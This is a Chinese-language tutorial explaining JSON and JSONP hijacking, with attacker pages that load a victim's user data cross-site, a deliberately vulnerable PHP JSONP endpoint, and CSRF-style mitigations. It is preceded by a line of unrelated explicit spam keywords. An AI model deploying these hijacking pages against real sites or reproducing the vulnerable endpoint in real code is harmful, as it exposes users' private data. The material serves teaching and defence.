亚洲乱码中文字幕综合,中国熟女仑乱hd,亚洲精品乱拍国产一区二区三区,一本大道卡一卡二卡三乱码全集资源,又粗又黄又硬又爽的免费视频

詳解JSON和JSONP劫持以及解決方法

 更新時(shí)間:2019年03月08日 14:47:00   作者:yjclsx  
這篇文章主要介紹了詳解JSON和JSONP劫持以及解決方法,文中通過示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來一起學(xué)習(xí)學(xué)習(xí)吧

json劫持

json劫持攻擊又為”JSON Hijacking”,攻擊過程有點(diǎn)類似于csrf,只不過csrf只管發(fā)送http請(qǐng)求,但是json-hijack的目的是獲取敏感數(shù)據(jù)。

一些web應(yīng)用會(huì)把一些敏感數(shù)據(jù)以json的形式返回到前端,如果僅僅通過cookie來判斷請(qǐng)求是否合法,那么就可以利用類似csrf的手段,向目標(biāo)服務(wù)器發(fā)送請(qǐng)求,以獲得敏感數(shù)據(jù)。

比如下面的鏈接在已登錄的情況下會(huì)返回json格式的用戶信息:

http://www.test.com/userinfo

攻擊者可以在自己的虛假頁(yè)面中,加入如下標(biāo)簽:

<script src="http://www.test.com/userinfo"></script>

如果當(dāng)前瀏覽器已經(jīng)登錄了www.test.com,并且cookie未過期,然后訪問了攻擊者的虛假頁(yè)面,那么該頁(yè)面就可以拿到j(luò)son形式的用戶敏感信息,因?yàn)閟cript標(biāo)簽會(huì)自動(dòng)解析json數(shù)據(jù),生成對(duì)應(yīng)的js對(duì)象。然后再通過

Object.prototype.__defineSetter__

這個(gè)函數(shù)來觸發(fā)自己的惡意代碼。

但是這個(gè)函數(shù)在當(dāng)前的新版本chrome和firefox中都已經(jīng)失效了。

jsonp劫持

jsonp是一個(gè)非官方的協(xié)議,利用script元素的開放策略,網(wǎng)頁(yè)可以得到從其他來源動(dòng)態(tài)產(chǎn)生的json數(shù)據(jù),因此可以用來實(shí)現(xiàn)跨域。(關(guān)于JSONP可以參考我的博文:http://chabaoo.cn/article/31167.htm

web程序如果通過這種方式跨域之后,攻擊者完全可以在自己的虛假頁(yè)面中發(fā)起惡意的jsonp請(qǐng)求,這就引來了安全問題。比如:

<script>
function useUserInfo(v){
  alert(v.username);
}
</script>
<script src="http://www.test.com/userinfo?callback=useUserInfo"></script>

如果服務(wù)器端的userinfo接口支持jsonp,那就會(huì)使虛假頁(yè)面成功執(zhí)行useUserInfo函數(shù),從而導(dǎo)致安全問題。

解決方法

其實(shí)json劫持和jsonp劫持屬于CSRF( Cross-site request forgery 跨站請(qǐng)求偽造)的攻擊范疇,所以解決的方法和解決csrf的方法一樣。

1、驗(yàn)證 HTTP Referer 頭信息;
2、在請(qǐng)求中添加 csrfToken 并在后端進(jìn)行驗(yàn)證;

關(guān)于CSRF攻擊可以參考我的博文:http://chabaoo.cn/article/157550.htm 

PS:JSONP劫持漏洞實(shí)例

getUser.php

<?php
header('Content-type: application/json');
$jsoncallback = htmlspecialchars($_REQUEST ['jsoncallback']);//獲取回調(diào)函數(shù)名
//json數(shù)據(jù)
//$json_data = '["id","user"]';
$json_data='({"id":"1","name":"Aaron"})';
echo $jsoncallback . "(" . $json_data . ")";//輸出jsonp格式的數(shù)據(jù)
?>

Payload利用:

客戶端實(shí)現(xiàn) callbackFunction 函數(shù)

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>JSONP劫持測(cè)試</title>
</head>
<body>
<script type="text/javascript">
function callbackFunction(result)
    {
      alert(result.name);
    }
</script>
<script type="text/javascript" src="http://127.0.0.1/test/getUser.php?jsoncallback=callbackFunction"></script>
</body>
</html>

jQuery 使用 JSONP

<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>JSONP劫持測(cè)試</title>
  <script src="http://cdn.static.runoob.com/libs/jquery/1.8.3/jquery.js"></script>  
</head>
<body>
<div id="divCustomers"></div>

<script type="text/javascript">  
  $.getJSON("http://127.0.0.1/test/getUser.php?jsoncallback=?", function(getUsers){
     alert(getUsers.name);
  });
</script>
</body>
</html>

以上就是本文的全部?jī)?nèi)容,希望對(duì)大家的學(xué)習(xí)有所幫助,也希望大家多多支持腳本之家。權(quán)聲明:本文為博主原創(chuàng)文章,轉(zhuǎn)載請(qǐng)附上博文鏈接!

相關(guān)文章

最新評(píng)論